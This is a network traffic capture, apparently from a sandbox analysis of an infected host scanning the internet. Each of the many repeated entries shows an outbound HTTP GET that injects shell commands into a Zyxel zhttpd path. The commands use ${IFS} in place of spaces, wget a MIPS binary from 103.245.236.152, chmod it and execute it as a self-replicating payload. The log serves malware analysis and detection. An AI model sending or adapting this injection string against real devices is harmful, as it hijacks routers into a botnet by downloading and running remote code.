                                            Jan 14, 2024 15:50:54.714852095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8400192.168.2.234597267.95.50.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.714874983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8401192.168.2.2358424177.207.220.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.714931011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8402192.168.2.2342028174.49.80.246443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.714952946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8403192.168.2.2351666185.234.137.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.715006113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8404192.168.2.2340926170.254.125.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.715035915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8405192.168.2.2339080114.107.108.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.715087891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8406192.168.2.2337294177.252.155.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.715120077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8407192.168.2.2360936126.134.81.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.715166092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8408192.168.2.234487850.61.12.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.715225935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8409192.168.2.23591841.61.210.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.715265036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8410192.168.2.2335294138.244.61.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.715302944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8411192.168.2.2343824189.233.20.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.715323925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8412192.168.2.2347408131.228.105.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.715332985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8413192.168.2.2350174175.94.22.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.715337992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8414192.168.2.235329424.17.151.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.715399981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8415192.168.2.234772873.98.22.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.715461016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8416192.168.2.2343358219.143.255.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.715488911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8417192.168.2.2342214160.79.52.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.715539932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8418192.168.2.2353976219.251.250.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.715610027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8419192.168.2.2349002172.144.182.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.715642929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8420192.168.2.2354308189.171.45.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.715672970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8421192.168.2.2334880185.78.5.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.715728045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8422192.168.2.2345120209.144.120.134443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.715768099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8423192.168.2.2336210195.77.235.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.715802908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8424192.168.2.2341558155.75.169.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.715868950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8425192.168.2.2333246146.35.63.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.715888977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8426192.168.2.2349090222.67.21.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.715943098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8427192.168.2.233862635.238.99.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.715989113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8428192.168.2.2348830205.159.221.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.716037035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8429192.168.2.2334092188.245.152.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.716090918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8430192.168.2.2335980125.191.249.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.716121912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8431192.168.2.2356892159.131.87.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.716192961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8432192.168.2.2359842223.113.207.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.716248035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8433192.168.2.233916459.33.93.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.716290951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8434192.168.2.233403018.72.74.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.716348886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8435192.168.2.235381269.207.242.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.716387033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8436192.168.2.234553247.188.7.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.716443062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8437192.168.2.2350282124.151.12.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.716470957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8438192.168.2.233431295.15.152.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.716527939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8439192.168.2.235656467.188.176.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.716597080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8440192.168.2.2358518108.146.134.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.716634035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8441192.168.2.233600475.151.183.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.716682911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8442192.168.2.2347786134.231.78.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.716702938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8443192.168.2.2333316172.61.30.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.716768026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8444192.168.2.2333168119.57.248.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.716795921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8445192.168.2.2340312204.74.53.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.716859102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8446192.168.2.236099037.105.110.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.716893911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8447192.168.2.233952412.151.185.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.716917992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8448192.168.2.2355556148.232.208.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.716967106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8449192.168.2.2340814146.12.78.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.717026949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8450192.168.2.2353450195.14.141.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.717075109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8451192.168.2.2357382104.235.117.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.717137098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8452192.168.2.235876259.166.163.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.717164993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8453192.168.2.233391236.174.85.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.717210054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8454192.168.2.2353120167.225.152.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.717257023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8455192.168.2.235874635.62.124.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.717281103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8456192.168.2.2347696125.40.105.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.717344046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8457192.168.2.2338048119.18.223.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.717375040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8458192.168.2.2342374165.11.69.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.717426062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8459192.168.2.2343444221.141.63.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.717453003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8460192.168.2.2335730121.88.120.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.717524052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8461192.168.2.2352048133.78.220.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.717556000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8462192.168.2.2347332108.213.229.7443
                                            TimestampBytes transferredDirectionData
